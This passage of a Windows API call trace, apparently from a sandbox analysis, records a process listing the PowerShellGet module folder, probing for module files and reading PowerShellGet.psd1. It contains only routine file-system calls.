ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0151.981] FindClose (in: hFindFile=0x2386d3b4a10 | out: hFindFile=0x2386d3b4a10) returned 1 [0151.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0151.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.983] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.983] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.983] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0151.983] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0151.984] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0151.984] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0151.984] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0151.984] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0151.986] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b47d0 [0151.987] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.987] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.987] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0151.987] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0151.987] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0151.988] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0151.988] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.988] FindClose (in: hFindFile=0x2386d3b47d0 | out: hFindFile=0x2386d3b47d0) returned 1 [0151.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xafa508dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0151.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e100) returned 1 [0151.989] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e1e0 | out: lpFileInformation=0xafa508e1e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0151.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e0c0) returned 1 [0151.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e150) returned 1 [0151.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xafa508dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0151.989] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xafa508de60 | out: lpFindFileData=0xafa508de60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4fb0 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0151.991] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0151.992] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0151.992] FindClose (in: hFindFile=0x2386d3b4fb0 | out: hFindFile=0x2386d3b4fb0) returned 1 [0151.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e080) returned 1 [0151.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e040) returned 1 [0151.993] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0151.994] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0151.994] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0151.994] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0151.994] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0151.994] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0151.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.994] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0151.995] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5370 [0151.995] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.995] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0151.995] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.996] FindClose (in: hFindFile=0x2386d3b5370 | out: hFindFile=0x2386d3b5370) returned 1 [0151.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.996] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xafa508deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0151.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e300) returned 1 [0151.996] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e3e0 | out: lpFileInformation=0xafa508e3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0151.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e2c0) returned 1 [0151.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xafa508dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0151.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0a0) returned 1 [0151.997] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x59c [0151.997] GetFileType (hFile=0x59c) returned 0x1 [0151.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e010) returned 1 [0151.997] GetFileType (hFile=0x59c) returned 0x1 [0151.997] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0152.000] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0152.000] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0152.000] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 